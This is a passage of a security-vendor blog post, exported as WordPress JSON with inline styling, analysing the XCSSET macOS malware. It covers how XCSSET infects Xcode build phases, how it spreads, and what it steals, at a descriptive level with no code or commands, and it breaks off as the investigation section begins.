{"id":5507,"date":"2026-04-29T13:55:35","date_gmt":"2026-04-29T13:55:35","guid":{"rendered":"https:\/\/adex.com\/blog\/?p=5507"},"modified":"2026-05-01T16:04:29","modified_gmt":"2026-05-01T16:04:29","slug":"case-study-xcsset-attack","status":"publish","type":"post","link":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","title":{"rendered":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines"},"content":{"rendered":"\n<p>MacOS has long been considered inherently resistant to malware, but the threat landscape tells a different story. Attacks targeting the Apple ecosystem are more frequent and sophisticated than commonly assumed.&nbsp;<\/p>\n\n\n\n<p>The Adex team encountered this reality first-hand: we detected, analyzed, and attributed an active <strong>XCSSET infection<\/strong> \u2013 one of the most persistent and evasive malware families targeting macOS developers. This case study breaks down how the attack works and what teams can do to defend against it.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<div class=\"toc\"><h4 class=\"toc__title\" id=\"contents\">Contents<\/h4><ul class=\"toc__list\"><li class=\"toc__list_item\"><a href=\"#malware-profile-what-is-xcsset\">Malware Profile: What is XCSSET<\/a><\/li><li class=\"toc__list_item\"><a href=\"#attack-anatomy-how-does-it-compromise-the-system\">Attack Anatomy: How Does It Compromise the System?<\/a><\/li><li class=\"toc__list_item\"><a href=\"#who-is-at-risk\">Who Is at Risk?<\/a><\/li><li class=\"toc__list_item\"><a href=\"#what-attackers-walk-away-with\">What Attackers Walk Away With<\/a><\/li><li class=\"toc__list_item\"><a href=\"#sample-discovery-and-behavioral-analysis\">Sample Discovery and Behavioral Analysis<\/a><\/li><li class=\"toc__list_item\"><a href=\"#building-the-protection-mechanisms\">Building the Protection Mechanisms<\/a><\/li><li class=\"toc__list_item\"><a 
href=\"#why-our-sample-is-almost-certainly-xcsset\">Why Our Sample Is Almost Certainly XCSSET<\/a><\/li><li class=\"toc__list_item\"><a href=\"#for-developers-what-to-check-right-now\">For Developers: What to Check Right Now<\/a><\/li><li class=\"toc__list_item\"><a href=\"#for-organizations-detection-containment-and-policy\">For Organizations: Detection, Containment, and Policy<\/a><\/li><li class=\"toc__list_item\"><a href=\"#infected-repositories-on-github-xcsset-in-the-wild\">Infected Repositories on GitHub: XCSSET in the Wild<\/a><\/li><li class=\"toc__list_item\"><a href=\"#selected-highlights\">Selected Highlights<\/a><\/li><li class=\"toc__list_item\"><a href=\"#running-the-search-independently\">Running the Search Independently<\/a><\/li><li class=\"toc__list_item\"><a href=\"#the-bigger-picture\">The Bigger Picture<\/a><\/li><li class=\"toc__list_item\"><a href=\"#appendix-1-full-list-24-repositories\">Appendix #1: Full List (24 repositories)<\/a><\/li><li class=\"toc__list_item\"><a href=\"#appendix-2-csset-timeline\">Appendix #2: CSSET Timeline<\/a><\/li><\/ul><\/div><style>\n.toc {}\n.toc__title {\n      font-size: 32px;\n    line-height: 40px;\n    font-weight: 700;\n}\n.toc__list_item {\n    color: #FE645A !important;\n}\n.toc__list_item:not(:last-child){\n    margin-bottom: 5px;\n}\n.toc__list_item a {\n    font-size: 18px;\n    line-height: 24px;\n    color: #FE645A;\n    font-weight: 600;\n}\n.toc__list_item a:hover {\n    text-decoration: underline;\n}\n@media (max-width: 1023px) {.toc__title {font-size: 24px;line-height: 32px;}}\n<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"malware-profile-what-is-xcsset\">Malware Profile: What is XCSSET<\/h2>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p><strong>XCSSET<\/strong> is a modular macOS malware family first discovered in the summer of 2020 that has since undergone significant evolution. 
It is distributed through compromised Xcode projects and triggered at compile time \u2013 the moment a developer builds the project, the malicious payload executes.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>What sets XCSSET apart from more conventional malware is where it lives: not inside the compiled application, but embedded within the Xcode project itself. This distinction makes it particularly difficult to detect: there is nothing obviously malicious in the final app, and the infection is concealed in the build configuration files that most security tools never inspect.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><strong><em>About Xcode<\/em><\/strong><\/p>\n\n\n\n<p>Xcode is Apple&#8217;s official integrated development environment (IDE) for building applications for macOS, iOS, iPadOS, watchOS, and tvOS. It is the standard toolchain for every Apple platform developer: from independent creators to enterprise engineering teams.<\/p>\n\n\n\n<p>Xcode projects are typically stored and shared via version control platforms such as GitHub, which makes them a natural vector for supply chain attacks: a developer clones what appears to be a legitimate project, opens it in Xcode, hits Build, and the malicious payload executes as a natural part of the compilation process. No suspicious downloads, no unusual permissions, no red flags from the system. 
The attack is entirely invisible within the standard developer workflow.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"attack-anatomy-how-does-it-compromise-the-system\">Attack Anatomy: How Does It Compromise the System?<\/h2>\n\n\n\n<p>Every Xcode project contains a set of build phase instructions \u2013 a configuration that tells the IDE exactly what to do when a developer hits Build: which scripts to run, which resources to bundle, which tests to execute.&nbsp;<\/p>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>XCSSET exploits this mechanism by injecting an additional build phase script into the project. The insertion is silent and requires no special privileges: it runs under the developer&#8217;s own account, inheriting all of their system access.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>Once triggered at compile time, the malicious script performs several actions in parallel: it harvests credentials and session tokens from browsers and cryptocurrency wallets, establishes persistence by registering itself as a login item so it survives reboots, and \u2013 most critically \u2013 scans the device for other Xcode projects and injects itself into each of them. In essence, the infection was designed to spread on its own.<\/p>\n\n\n\n<p>From here on, the infection spreads through three paths:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Repository:<\/strong> The dev pushes to GitHub, and anyone who clones and builds gets infected. 
No extra steps needed.<\/li>\n\n\n\n<li><strong>Dependency:<\/strong> If the project is used inside a larger codebase, the malicious script spreads upstream.<\/li>\n\n\n\n<li><strong>Credentials:<\/strong> Browsers on the infected machine are trojaned, exposing session tokens and login data \u2013 a risk that reaches far beyond the developer&#8217;s own environment.<\/li>\n<\/ul>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\"><p>No infected apps have reached the App Store, and direct binary injection remains undocumented (Intego, 2020). The risk to end users is indirect, but it&#8217;s real.<\/p>\n<\/p><\/div>\n    <style>.block__quote {margin: 32px 0;padding-left: 20px;border-left: 3px solid #00B8A7;}.block__quote_desc {font-weight: 700 !important;font-size: 18px !important;line-height: 28px !important;margin-bottom: 24px !important;}.block__quote_author {display: none;}<\/style>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 36px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 24px;\n    line-height: 1.3;\n  }\n\n  .flow { display: flex; flex-direction: column; }\n\n  .flow-step {\n    display: flex;\n    align-items: flex-start;\n    gap: 14px;\n    position: relative;\n  }\n\n  .flow-step:not(:last-child)::after {\n    content: '';\n    position: absolute;\n    left: 19px;\n    top: 40px;\n    width: 2px;\n    height: calc(100% - 8px);\n    background: linear-gradient(to bottom, #00DBC7, #00DBC722);\n  }\n\n  .step-icon {\n    width: 40px;\n    height: 40px;\n    border-radius: 50%;\n    
background: #f0fdfb;\n    border: 2px solid #00DBC7;\n    display: flex;\n    align-items: center;\n    justify-content: center;\n    flex-shrink: 0;\n    font-size: 16px;\n    position: relative;\n    z-index: 1;\n    box-shadow: 0 2px 10px rgba(0,219,199,0.15);\n  }\n\n  .step-body {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 13px 18px;\n    flex: 1;\n    margin-bottom: 12px;\n    box-shadow: 0 2px 8px rgba(15,0,99,0.04);\n  }\n\n  .step-header {\n    display: flex;\n    align-items: baseline;\n    gap: 10px;\n    margin-bottom: 5px;\n  }\n\n  .step-label {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.1em;\n    text-transform: uppercase;\n    color: #00A696;\n    flex-shrink: 0;\n  }\n\n  .step-title {\n    font-size: 14px;\n    font-weight: 600;\n    color: #0F0063;\n  }\n\n  .step-desc {\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.6;\n  }\n\n  .actions-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 8px;\n    margin-top: 10px;\n  }\n\n  .action-card {\n    background: #ffffff;\n    border: 1px solid #d6f7f4;\n    border-top: 3px solid #00DBC7;\n    border-radius: 10px;\n    padding: 11px 10px;\n    text-align: center;\n  }\n\n  .action-icon { font-size: 18px; margin-bottom: 5px; }\n\n  .action-label {\n    font-size: 11.5px;\n    font-weight: 600;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .action-sub {\n    font-size: 10.5px;\n    color: #8b90b8;\n    margin-top: 2px;\n    line-height: 1.35;\n  }\n\n  .vectors-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 8px;\n    margin-top: 10px;\n  }\n\n  .vector-card {\n    background: #ffffff;\n    border: 1px solid #e8eaf5;\n    border-radius: 10px;\n    padding: 11px 12px;\n  }\n\n  .vector-tag {\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 
20px;\n    display: inline-block;\n    margin-bottom: 6px;\n  }\n\n  .tag-primary   { background: #fff0ef; color: #FF645A; }\n  .tag-secondary { background: #ede9fe; color: #A05DD2; }\n  .tag-tertiary  { background: #e6eeff; color: #00389C; }\n\n  .vector-title {\n    font-size: 12.5px;\n    font-weight: 600;\n    color: #0F0063;\n    margin-bottom: 3px;\n  }\n\n  .vector-desc {\n    font-size: 11.5px;\n    color: #8b90b8;\n    line-height: 1.5;\n  }\n\n  .note {\n    margin-top: 16px;\n    background: #f0fdfb;\n    border-left: 3px solid #00DBC7;\n    border-radius: 0 10px 10px 0;\n    padding: 12px 16px;\n    font-size: 12px;\n    color: #4a4f7a;\n    line-height: 1.65;\n  }\n\n  .note strong { color: #0F0063; }\n\n  @media (max-width: 600px) {\n    .actions-grid, .vectors-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 24px 14px; }\n  }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"section-label\">Attack Anatomy<\/div>\n  <div class=\"section-heading\">How Does XCSSET Compromise the System?<\/div>\n  <div class=\"flow\">\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\uddc2\ufe0f<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 01<\/span>\n          <span class=\"step-title\">Infected Project Opened<\/span>\n        <\/div>\n        <div class=\"step-desc\">A developer opens a compromised Xcode project. 
The payload sits not in the code, but in the <strong>build phase<\/strong> \u2014 instructions Xcode runs automatically when Build is triggered.<\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\u2699\ufe0f<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 02<\/span>\n          <span class=\"step-title\">Build Triggered \u2192 Script Executes<\/span>\n        <\/div>\n        <div class=\"step-desc\">The injected script runs silently the moment the developer hits Build \u2014 no prompts, no elevated privileges. It runs as the developer&#8217;s own user.<\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\udca5<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 03<\/span>\n          <span class=\"step-title\">Three Actions Fire in Parallel<\/span>\n        <\/div>\n        <div class=\"actions-grid\">\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83c\udf6a<\/div>\n            <div class=\"action-label\">Credential Harvest<\/div>\n            <div class=\"action-sub\">Browsers, session tokens, crypto wallets<\/div>\n          <\/div>\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83d\udd01<\/div>\n            <div class=\"action-label\">Persistence<\/div>\n            <div class=\"action-sub\">Login item registered, survives reboots<\/div>\n          <\/div>\n          <div class=\"action-card\">\n            <div class=\"action-icon\">\ud83e\uddec<\/div>\n            <div class=\"action-label\">Self-Replication<\/div>\n            <div class=\"action-sub\">Injects into all other Xcode projects on disk<\/div>\n          <\/div>\n        <\/div>\n      <\/div>\n    <\/div>\n\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83d\udce1<\/div>\n 
     <div class=\"step-body\">\n        <div class=\"step-header\">\n          <span class=\"step-label\">Step 04<\/span>\n          <span class=\"step-title\">Spreads via Three Vectors<\/span>\n        <\/div>\n        <div class=\"vectors-grid\">\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-primary\">Primary<\/span>\n            <div class=\"vector-title\">Repository<\/div>\n            <div class=\"vector-desc\">Dev pushes to GitHub \u2192 clone + build = infected. Zero interaction needed.<\/div>\n          <\/div>\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-secondary\">Secondary<\/span>\n            <div class=\"vector-title\">Dependency<\/div>\n            <div class=\"vector-desc\">Infected project used as a component \u2014 build phase script propagates upstream.<\/div>\n          <\/div>\n          <div class=\"vector-card\">\n            <span class=\"vector-tag tag-tertiary\">Tertiary<\/span>\n            <div class=\"vector-title\">Credentials<\/div>\n            <div class=\"vector-desc\">Trojaned browsers expose session tokens \u2014 risk extends beyond the dev machine.<\/div>\n          <\/div>\n        <\/div>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <div class=\"note\">\n    <strong>Note:<\/strong> No injection into compiled Mach-O binaries has been documented; no infected builds reached the App Store <em>(Intego, 2020)<\/em>. 
This is a textbook <strong>supply chain attack<\/strong> \u2014 the trusted developer is the target, not the end user directly.\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<p>This is a textbook supply chain attack: the target is not the end user directly, but the trusted link between them and the software, namely the developer, their tools, and their repositories.<\/p>\n\n\n    <div class=\"block__quote\"><p class=\"block__quote_desc\">XCSSET isn&#8217;t new territory: XcodeGhost (2015) also used Xcode as an attack surface. The difference: XcodeGhost corrupted the Xcode installer itself, which made it detectable. XCSSET doesn&#8217;t touch Xcode at all \u2013 it hides inside individual projects, where no one thinks to look.<\/p>\n<\/div>\n    <style>.block__quote {margin: 32px 0;padding-left: 20px;border-left: 3px solid #00B8A7;}.block__quote_desc {font-weight: 700 !important;font-size: 18px !important;line-height: 28px !important;margin-bottom: 24px !important;}.block__quote_author {display: none;}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"who-is-at-risk\">Who Is at Risk?<\/h2>\n\n\n\n<p>Anyone in the Apple development ecosystem is a potential target.<\/p>\n\n\n\n<p>The risk is highest for teams that regularly pull Xcode projects or SDKs from GitHub <em>(more on that later)<\/em>, independent developers who work with third-party templates and starter repositories, and any organization whose software is built on macOS. 
If a machine is used to build iOS or macOS apps, it is a viable entry point.<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 28px;\n    line-height: 1.3;\n  }\n\n  .risk-grid {\n    display: grid;\n    grid-template-columns: repeat(3, 1fr);\n    gap: 12px;\n  }\n\n  .risk-card {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-top: 3px solid #00DBC7;\n    border-radius: 12px;\n    padding: 18px 16px;\n  }\n\n  .risk-icon {\n    font-size: 22px;\n    margin-bottom: 10px;\n  }\n\n  .risk-title {\n    font-size: 13px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.4;\n  }\n\n  .risk-desc {\n    font-size: 12px;\n    color: #8b90b8;\n    line-height: 1.6;\n  }\n\n  @media (max-width: 600px) {\n    .risk-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n  }\n<\/style>\n<div class=\"wrap\">\n\n  <div class=\"section-label\">Exposure<\/div>\n  <div class=\"section-heading\">Who Is at Risk?<\/div>\n\n  <div class=\"risk-grid\">\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83d\udc65<\/div>\n      <div class=\"risk-title\">Teams on GitHub<\/div>\n      <div class=\"risk-desc\">Regularly pull Xcode projects, SDKs, or dependencies from public repositories.<\/div>\n    <\/div>\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83e\uddd1\u200d\ud83d\udcbb<\/div>\n      <div class=\"risk-title\">Independent 
Developers<\/div>\n      <div class=\"risk-desc\">Use third-party templates or starter repositories \u2014 common practice, rarely scrutinized.<\/div>\n    <\/div>\n\n    <div class=\"risk-card\">\n      <div class=\"risk-icon\">\ud83c\udfe2<\/div>\n      <div class=\"risk-title\">Any macOS Build Environment<\/div>\n      <div class=\"risk-desc\">Organizations shipping iOS or macOS software. The build machine is the target.<\/div>\n    <\/div>\n\n  <\/div>\n\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"what-attackers-walk-away-with\">What Attackers Walk Away With<\/h2>\n\n\n\n<p>With unrestricted access to the infected machine, XCSSET operates across three vectors: data theft, system manipulation, and persistence.<\/p>\n\n\n\n<p><strong>Data Theft<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>XCSSET pulls credentials directly from Keychain and configuration files: cloud keys, AWS tokens, SSH keys, Git access, and advertising platform tokens (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).&nbsp;<\/li>\n\n\n\n<li>Browser sessions are compromised across Safari, Chrome, and, as of the 2025 variant, Firefox.&nbsp;<\/li>\n\n\n\n<li>Messenger data is also in scope: Telegram, WeChat, QQ, Skype, Apple Notes, and Evernote (<a href=\"https:\/\/trendmicro.com\/en_ca\/research\/21\/g\/updated-xcsset-malware-targets-telegram--other-apps.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2021<\/a>).&nbsp;<\/li>\n\n\n\n<li>Screenshots can be captured silently via <a href=\"https:\/\/www.jamf.com\/blog\/zero-day-tcc-bypass-discovered-in-xcsset-malware\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">CVE-2021-30713<\/a>, bypassing macOS privacy controls 
entirely.<\/li>\n<\/ul>\n\n\n\n<p><strong>Manipulate<\/strong><\/p>\n\n\n\n<p>Any BTC or ETH address copied to the clipboard is silently replaced with one controlled by the attacker. The payment still goes through, but it lands in the attacker&#8217;s wallet instead of the intended one (<a href=\"http:\/\/microsoft\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft, Sept 2025<\/a>).&nbsp;<\/p>\n\n\n\n<p>On top of that, XCSSET replaces Safari, Chrome, and Firefox with modified versions carrying an injected JavaScript backdoor, giving the attacker persistent access to everything the browser touches (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).<\/p>\n\n\n\n<p><strong>Persist &amp; Damage<\/strong><\/p>\n\n\n\n<p>Every Xcode project on the machine gets infected: new injection methods were documented as recently as 2025, according to <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/17\/new-xcsset-malware-variant-found-in-the-wild\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft<\/a>. 
And from the very first report: XCSSET ships with a ransomware module capable of encrypting files (<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/h\/xcsset-mac-malware--infects-xcode-projects--performs-uxss-attack.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Trend Micro, 2020<\/a>).<\/p>\n\n\n\n<div class=\"htmlAdexBlock\">\n<style>\n  .wrap {\n    font-family: sans-serif;\n    background: #ffffff;\n    color: #0F0063;\n    padding: 40px 28px;\n    border-radius: 16px;\n    max-width: 860px;\n    margin: 0 auto;\n    border: 1px solid #e8eaf5;\n  }\n\n  .section-label {\n    font-size: 12px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    color: #00DBC7;\n    margin-bottom: 8px;\n  }\n\n  .section-heading {\n    font-size: 22px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 6px;\n    line-height: 1.3;\n  }\n\n  .section-sub {\n    font-size: 13.5px;\n    color: #4a4f7a;\n    margin-bottom: 28px;\n    line-height: 1.6;\n  }\n\n  .category-label {\n    font-size: 11px;\n    font-weight: 700;\n    letter-spacing: 0.1em;\n    text-transform: uppercase;\n    color: #8b90b8;\n    margin-bottom: 10px;\n    margin-top: 24px;\n  }\n\n  .cards-grid {\n    display: grid;\n    grid-template-columns: repeat(2, 1fr);\n    gap: 10px;\n  }\n\n  .card {\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 12px;\n    padding: 16px 18px;\n    display: flex;\n    gap: 14px;\n    align-items: flex-start;\n  }\n\n  .card-icon {\n    font-size: 20px;\n    flex-shrink: 0;\n    margin-top: 1px;\n  }\n  .card-title {\n    font-size: 13px;\n    font-weight: 700;\n    color: #0F0063;\n    margin-bottom: 4px;\n    line-height: 1.4;\n  }\n\n  .card-desc {\n    font-size: 12px;\n    color: #8b90b8;\n    line-height: 1.6;\n  }\n\n  .card-source {\n    display: inline-block;\n    margin-top: 6px;\n    font-size: 10px;\n    font-weight: 600;\n    color: #a0a5c8;\n    letter-spacing: 
0.05em;\n  }\n\n  \/* severity borders *\/\n  .card.high   { border-left: 3px solid #FF645A; }\n  .card.medium { border-left: 3px solid #A05DD2; }\n  .card.low    { border-left: 3px solid #00DBC7; }\n\n  .tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.07em;\n    text-transform: uppercase;\n    padding: 2px 8px;\n    border-radius: 20px;\n    margin-bottom: 6px;\n  }\n\n  .tag-steal   { background: #fff0ef; color: #FF645A; }\n  .tag-persist { background: #ede9fe; color: #A05DD2; }\n  .tag-damage  { background: #fff4e0; color: #D97706; }\n\n  @media (max-width: 600px) {\n    .cards-grid { grid-template-columns: 1fr; }\n    .section-heading { font-size: 18px; }\n    .wrap { padding: 28px 16px; }\n  }\n<\/style>\n<div class=\"wrap\">\n  <div class=\"section-label\">Capabilities<\/div>\n  <div class=\"section-heading\">What Does XCSSET Actually Do?<\/div>\n  <div class=\"section-sub\">Once active, XCSSET operates across three areas: data theft, system manipulation, and persistence.<\/div>\n  <!-- STEAL -->\n  <div class=\"category-label\">Steal<\/div>\n  <div class=\"cards-grid\">\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udd11<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Credentials<\/span>\n        <div class=\"card-title\">Keychain &#038; Config Files<\/div>\n        <div class=\"card-desc\">Cloud keys, AWS tokens, SSH keys, Git access, advertising platform tokens.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020<\/span>\n      <\/div>\n    <\/div>\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83c\udf6a<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Sessions<\/span>\n        <div class=\"card-title\">Browser Cookies &#038; Sessions<\/div>\n        <div class=\"card-desc\">Safari, Chrome \u2014 and Firefox as of the 2025 variant.<\/div>\n        <span class=\"card-source\">Trend 
Micro, 2020 \u00b7 Microsoft, 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udcac<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Data<\/span>\n        <div class=\"card-title\">Messengers &#038; Notes<\/div>\n        <div class=\"card-desc\">Telegram, WeChat, QQ, Skype, Apple Notes, Evernote.<\/div>\n        <span class=\"card-source\">Trend Micro, 2021<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card high\">\n      <div class=\"card-icon\">\ud83d\udcf8<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Surveillance<\/span>\n        <div class=\"card-title\">Screen Capture<\/div>\n        <div class=\"card-desc\">Silent screenshots via CVE-2021-30713, bypassing TCC privacy controls.<\/div>\n        <span class=\"card-source\">CVE-2021-30713<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <!-- MANIPULATE -->\n  <div class=\"category-label\">Manipulate<\/div>\n  <div class=\"cards-grid\">\n\n    <div class=\"card medium\">\n      <div class=\"card-icon\">\ud83d\udccb<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-persist\">Clipboard<\/span>\n        <div class=\"card-title\">Crypto Wallet Hijacking<\/div>\n        <div class=\"card-desc\">Detects BTC\/ETH addresses in clipboard and silently replaces them with attacker-controlled ones.<\/div>\n        <span class=\"card-source\">Microsoft, Sept 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card medium\">\n      <div class=\"card-icon\">\ud83c\udf10<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-persist\">Trojanization<\/span>\n        <div class=\"card-title\">Browser Backdoor<\/div>\n        <div class=\"card-desc\">Replaces Safari, Chrome, Firefox with modified versions carrying an injected JavaScript backdoor.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020 \u00b7 Intego, 
2020<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <!-- PERSIST & DAMAGE -->\n  <div class=\"category-label\">Persist &#038; Damage<\/div>\n  <div class=\"cards-grid\">\n\n    <div class=\"card low\">\n      <div class=\"card-icon\">\ud83e\uddec<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-steal\">Propagation<\/span>\n        <div class=\"card-title\">Xcode Project Infection<\/div>\n        <div class=\"card-desc\">Injects into every Xcode project on the machine. New injection methods documented in 2025.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020 \u00b7 Microsoft, 2025<\/span>\n      <\/div>\n    <\/div>\n\n    <div class=\"card\" style=\"border-left: 3px solid #D97706;\">\n      <div class=\"card-icon\">\ud83d\udd12<\/div>\n      <div class=\"card-content\">\n        <span class=\"tag tag-damage\">Ransomware<\/span>\n        <div class=\"card-title\">File Encryption<\/div>\n        <div class=\"card-desc\">A ransomware module is bundled within XCSSET \u2014 documented since the original discovery.<\/div>\n        <span class=\"card-source\">Trend Micro, 2020<\/span>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"sample-discovery-and-behavioral-analysis\">Sample Discovery and Behavioral Analysis<\/h2>\n\n\n\n<p>One of Adex&#8217;s clients \u2013 an iOS app development studio \u2013 reached out with a specific concern: their infrastructure might already be exposed to XCSSET.&nbsp;<\/p>\n\n\n\n<p>Adex began a hands-on investigation. The process broke down into four stages: spotting the anomaly, capturing the sample, dissecting its behavior, and tracing how it established persistence.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"1-spotting-the-malware\">1. 
